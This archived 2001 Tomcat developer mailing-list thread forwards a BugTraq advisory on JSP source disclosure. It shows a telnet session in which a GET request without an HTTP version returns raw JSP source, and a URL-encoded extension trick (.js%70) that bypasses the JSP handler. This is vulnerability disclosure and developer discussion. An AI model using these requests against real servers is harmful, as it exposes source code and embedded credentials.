tomcat-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Jon Stevens <...@latchkey.com>
Subject Re: [Fwd: Tomcat may reveal script source code by URL trickery]
Date Wed, 04 Apr 2001 16:47:52 GMT
I know that these are just minor bugs in Tomcat (and other servlet
containers as well), but man, this is getting ridiculous. This is clearly
yet another reason to not use JSP. Especially when you have sites like this:

<http://www.devshed.com/Server_Side/Jserv/JSP5/page3.html>

Actually *encouraging* people to put their usernames and passwords into
their JSP files. The term "Gross negligence" comes to mind.

-jon


on 4/4/01 9:08 AM, "Craig R. McClanahan" <Craig.McClanahan@eng.sun.com>
wrote:

> Reported against Tomcat 3.2.1 on BugTraq.
> 
> Craig
> 
> 
> Eric Daniel Mauricio wrote:
> 
>> There is another way to get the source from a jsp page using Tomcat.
>> 
>> If you don't write HTTP/1.0 or HTTP/1.1 in the end of the GET request,
>> you will get the source code and not the jsp processed.
>> 
>> In other words, use Apache + Tomcat if you intend to protect your source
>> code.
>> 
>> telnet maq106 8080
>> Trying 10.0.0.106...
>> Connected to maq106
>> Escape character is '^]'.
>> GET /examples/jsp/num/numguess.jsp
>> HTTP/1.0 200 OK
>> Content-Type: text/plain
>> Content-Length: 1237
>> Last-Modified: Tue, 19 Dec 2000 18:54:46 GMT
>> Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0;
>> Windows 95 4.0 x86; java.vendor=Sun Microsystems Inc.)
>> 
>> <!--
>> Copyright (c) 1999 The Apache Software Foundation.  All rights
>> reserved.
>> 
>> Number Guess Game
>> Written by Jason Hunter, CTO, K&A Software
>> http://www.servlets.com
>> -->
>> 
>> <%@ page import = "num.NumberGuessBean" %>
>> 
>> <jsp:useBean id="numguess" class="num.NumberGuessBean" scope="session"/>
>> <jsp:setProperty name="numguess" property="*"/>
>> 
>> <html>
>> <head><title>Number Guess</title></head>
>> <body bgcolor="white">
>> <font size=4>
>> 
>> <% if (numguess.getSuccess()) { %>
>> 
>> Congratulations!  You got it.
>> And after just <%= numguess.getNumGuesses() %> tries.<p>
>> 
>> <% numguess.reset(); %>
>> 
>> Care to <a href="numguess.jsp">try again</a>?
>> 
>> <% } else if (numguess.getNumGuesses() == 0) { %>
>> 
>> Welcome to the Number Guess game.<p>
>> 
>> I'm thinking of a number between 1 and 100.<p>
>> 
>> <form method=get>
>> What's your guess? <input type=text name=guess>
>> <input type=submit value="Submit">
>> </form>
>> 
>> <% } else { %>
>> 
>> Good guess, but nope.  Try <b><%= numguess.getHint() %></b>.
>> 
>> You have made <%= numguess.getNumGuesses() %> guesses.<p>
>> 
>> I'm thinking of a number between 1 and 100.<p>
>> 
>> <form method=get>
>> What's your guess? <input type=text name=guess>
>> <input type=submit value="Submit">
>> </form>
>> 
>> <% } %>
>> 
>> </font>
>> </body>
>> </html>
>> Connection closed by foreign host.
>> 
>> [],
>> 
>> ericmau
>> 
>> "Sverre H. Huseby" <shh@THATHOST.COM> escreveu:
>> 
>>> Tomcat may reveal script source code by URL trickery
>>> ----------------------------------------------------
>>> 
>>> Sverre H. Huseby advisory 2001-03-29
>>> 
>>> 
>>> 
>>> Systems affected
>>> ----------------
>>> 
>>> Tomcat 4.0-b1 (latest milestone) and nighly build as of 2001-03-28
>>> tested.  Other versions may be vulnerable too.  The problem is only
>>> present when using Tomcat's built in web server, not when using Tomcat
>>> with Apache Web Server.
>>> 
>>> 
>>> Description
>>> -----------
>>> 
>>> Tomcat (http://jakarta.apache.org/tomcat/), the Reference
>>> Implementation for the Java Servlet 2.2 and JavaServer Pages 1.1
>>> Technologies, may be tricked into revealing the source code of JSP
>>> scripts by using simple URL encoding.
>>> 
>>> 
>>> Details
>>> -------
>>> 
>>> It seems that the built in web server in Tomcat does URL decoding in
>>> an unreasonable order.  URLs like the following
>>> 
>>> http://XXX:8080/examples/jsp/num/numguess.js%70
>>> 
>>> where %70 is an URL encoded 'p', returns the source code of index.jsp
>>> rather than running the script on the server side.
>>> 
>>> To speculate: The JSP handler is skipped as this URL does not end in
>>> ".jsp", but the static file handler is nevertheless able to map the
>>> URL into a correct file name.
>>> 
>>> 
>>> Impact
>>> ------
>>> 
>>> This design error makes it possible to fetch the source code of JSP
>>> scripts.  Such source code may contain database passwords and file
>>> names, and may reveal design errors or programming bugs that make it
>>> possible to further exploit the server or service.
>>> 
>>> 
>>> 
>>> Reported by Sverre H. Huseby, shh@thathost.com
>>> 
>>> --
>>> <URL:mailto:shh@thathost.com>
>>> <URL:http://shh.thathost.com/>
>>> 
> 


Mime
View raw message